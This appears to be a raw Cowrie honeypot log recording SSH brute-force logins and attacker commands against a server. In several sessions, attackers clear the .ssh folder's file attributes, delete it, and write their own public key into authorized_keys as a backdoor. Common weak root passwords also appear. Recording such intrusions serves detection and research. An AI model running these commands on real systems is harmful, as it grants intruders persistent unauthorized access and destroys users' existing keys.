{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:30:36.363400Z","src_ip":"103.100.209.195","session":"176a5082d707"}
{"eventid":"cowrie.session.connect","src_ip":"221.144.108.2","src_port":54225,"dst_ip":"1.2.3.4","dst_port":23,"session":"4d3439b645e4","protocol":"telnet","message":"New connection: 221.144.108.2:54225 (1.2.3.4:23) [session: 4d3439b645e4]","sensor":"my-vps","timestamp":"2025-09-09T00:30:44.121520Z"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":33444,"dst_ip":"1.2.3.4","dst_port":22,"session":"c71682fbe461","protocol":"ssh","message":"New connection: 43.156.132.147:33444 (1.2.3.4:22) [session: c71682fbe461]","sensor":"my-vps","timestamp":"2025-09-09T00:30:58.270224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:30:58.271308Z","src_ip":"43.156.132.147","session":"c71682fbe461"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:30:58.515309Z","src_ip":"43.156.132.147","session":"c71682fbe461"}
{"eventid":"cowrie.login.success","username":"root","password":"qwe123!!!","message":"login attempt [root/qwe123!!!] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:30:59.536351Z","src_ip":"43.156.132.147","session":"c71682fbe461"}
{"eventid":"cowrie.session.closed","duration":45.9017276763916,"message":"Connection lost after 45 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:30:59.538413Z","src_ip":"59.19.131.245","session":"1d19b1f3f443"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:31:00.081296Z","src_ip":"43.156.132.147","session":"c71682fbe461"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:31:00.082218Z","src_ip":"43.156.132.147","session":"c71682fbe461"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:31:00.083457Z","src_ip":"43.156.132.147","session":"c71682fbe461"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:31:00.328823Z","src_ip":"43.156.132.147","session":"c71682fbe461"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:31:00.844179Z","src_ip":"43.156.132.147","session":"c71682fbe461"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:31:00.845143Z","src_ip":"43.156.132.147","session":"c71682fbe461"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:31:01.092353Z","src_ip":"43.156.132.147","session":"c71682fbe461"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:31:01.093297Z","src_ip":"43.156.132.147","session":"c71682fbe461"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":49942,"dst_ip":"1.2.3.4","dst_port":22,"session":"45282c17bf1b","protocol":"ssh","message":"New connection: 43.156.132.147:49942 (1.2.3.4:22) [session: 45282c17bf1b]","sensor":"my-vps","timestamp":"2025-09-09T00:31:01.339350Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:31:01.340321Z","src_ip":"43.156.132.147","session":"45282c17bf1b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:31:01.588286Z","src_ip":"43.156.132.147","session":"45282c17bf1b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:31:02.624048Z","src_ip":"43.156.132.147","session":"45282c17bf1b"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:31:03.875418Z","src_ip":"43.156.132.147","session":"45282c17bf1b"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":49956,"dst_ip":"1.2.3.4","dst_port":22,"session":"dcf96d849edc","protocol":"ssh","message":"New connection: 43.156.132.147:49956 (1.2.3.4:22) [session: dcf96d849edc]","sensor":"my-vps","timestamp":"2025-09-09T00:31:04.119370Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:31:04.120471Z","src_ip":"43.156.132.147","session":"dcf96d849edc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:31:04.365293Z","src_ip":"43.156.132.147","session":"dcf96d849edc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:31:05.385417Z","src_ip":"43.156.132.147","session":"dcf96d849edc"}
{"eventid":"cowrie.session.closed","duration":"7.4","message":"Connection lost after 7.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:31:05.631537Z","src_ip":"43.156.132.147","session":"c71682fbe461"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:31:05.632364Z","src_ip":"43.156.132.147","session":"dcf96d849edc"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":54766,"dst_ip":"1.2.3.4","dst_port":22,"session":"73ebd213abd3","protocol":"ssh","message":"New connection: 152.32.129.236:54766 (1.2.3.4:22) [session: 73ebd213abd3]","sensor":"my-vps","timestamp":"2025-09-09T00:31:12.254099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:31:12.255116Z","src_ip":"152.32.129.236","session":"73ebd213abd3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:31:12.455191Z","src_ip":"152.32.129.236","session":"73ebd213abd3"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa@1234567","message":"login attempt [root/Aa@1234567] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:31:13.297513Z","src_ip":"152.32.129.236","session":"73ebd213abd3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:31:13.747496Z","src_ip":"152.32.129.236","session":"73ebd213abd3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:31:13.748000Z","src_ip":"152.32.129.236","session":"73ebd213abd3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:31:13.749426Z","src_ip":"152.32.129.236","session":"73ebd213abd3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:31:13.950457Z","src_ip":"152.32.129.236","session":"73ebd213abd3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:31:14.409316Z","src_ip":"152.32.129.236","session":"73ebd213abd3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:31:14.410021Z","src_ip":"152.32.129.236","session":"73ebd213abd3"}
{"eventid":"cowrie.session.closed","duration":30.38887310028076,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:31:14.510311Z","src_ip":"221.144.108.2","session":"4d3439b645e4"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:31:14.612004Z","src_ip":"152.32.129.236","session":"73ebd213abd3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:31:14.612871Z","src_ip":"152.32.129.236","session":"73ebd213abd3"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":55838,"dst_ip":"1.2.3.4","dst_port":22,"session":"94fe5b8c28bb","protocol":"ssh","message":"New connection: 152.32.129.236:55838 (1.2.3.4:22) [session: 94fe5b8c28bb]","sensor":"my-vps","timestamp":"2025-09-09T00:31:14.806281Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:31:14.807480Z","src_ip":"152.32.129.236","session":"94fe5b8c28bb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:31:15.612268Z","src_ip":"152.32.129.236","session":"94fe5b8c28bb"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:31:16.446733Z","src_ip":"152.32.129.236","session":"94fe5b8c28bb"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:31:17.647107Z","src_ip":"152.32.129.236","session":"94fe5b8c28bb"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":55840,"dst_ip":"1.2.3.4","dst_port":22,"session":"b230d0f1a05b","protocol":"ssh","message":"New connection: 152.32.129.236:55840 (1.2.3.4:22) [session: b230d0f1a05b]","sensor":"my-vps","timestamp":"2025-09-09T00:31:17.857182Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:31:17.857840Z","src_ip":"152.32.129.236","session":"b230d0f1a05b"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":35736,"dst_ip":"1.2.3.4","dst_port":22,"session":"82b7096f69f5","protocol":"ssh","message":"New connection: 51.250.72.176:35736 (1.2.3.4:22) [session: 82b7096f69f5]","sensor":"my-vps","timestamp":"2025-09-09T00:31:18.029022Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:31:18.029860Z","src_ip":"51.250.72.176","session":"82b7096f69f5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:31:18.062186Z","src_ip":"51.250.72.176","session":"82b7096f69f5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:31:18.064886Z","src_ip":"152.32.129.236","session":"b230d0f1a05b"}
{"eventid":"cowrie.login.success","username":"root","password":"Mm123456","message":"login attempt [root/Mm123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:31:18.231709Z","src_ip":"51.250.72.176","session":"82b7096f69f5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:31:18.317338Z","src_ip":"51.250.72.176","session":"82b7096f69f5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:31:18.318051Z","src_ip":"51.250.72.176","session":"82b7096f69f5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:31:18.319157Z","src_ip":"51.250.72.176","session":"82b7096f69f5"}
